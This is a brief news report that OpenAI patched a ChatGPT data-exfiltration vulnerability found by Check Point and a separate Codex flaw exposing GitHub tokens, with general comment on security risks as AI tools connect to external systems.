
OpenAI has patched a critical security vulnerability in ChatGPT that could have allowed attackers to extract sensitive user data without their knowledge, according to recent cybersecurity findings. The flaw, identified by researchers at Check Point, raised concerns about how AI systems handle and protect user information, especially in enterprise environments.
The vulnerability reportedly enabled a technique known as data exfiltration, where attackers could secretly retrieve information from user interactions. In this case, malicious actors could exploit the system to access conversation data through indirect methods, highlighting a growing risk as AI tools become more deeply integrated into workflows.
In addition to the ChatGPT issue, OpenAI also addressed a separate security flaw in its Codex system that involved exposure of GitHub authentication tokens. Such tokens could potentially grant unauthorized access to private repositories, making the vulnerability particularly serious for developers and organizations relying on AI-assisted coding tools.
The discovery underscores the evolving nature of cybersecurity threats in AI-driven platforms. As AI systems increasingly connect with external tools, APIs, and enterprise data sources, they expand the potential attack surface for hackers. Experts warn that these integrations, while enhancing functionality, also introduce new vectors for exploitation if not properly secured.
OpenAI has since rolled out patches to address both vulnerabilities, reinforcing its ongoing efforts to strengthen platform security. The company continues to invest in identifying and mitigating risks as AI adoption grows across industries, where safeguarding sensitive data remains a top priority for businesses and users alike.
The incident adds to a broader pattern of security challenges facing generative AI systems, where issues such as data leakage, prompt injection, and unauthorized access are becoming increasingly prominent. As organizations scale their use of AI, maintaining robust security frameworks will be essential to ensure trust and reliability in these technologies.




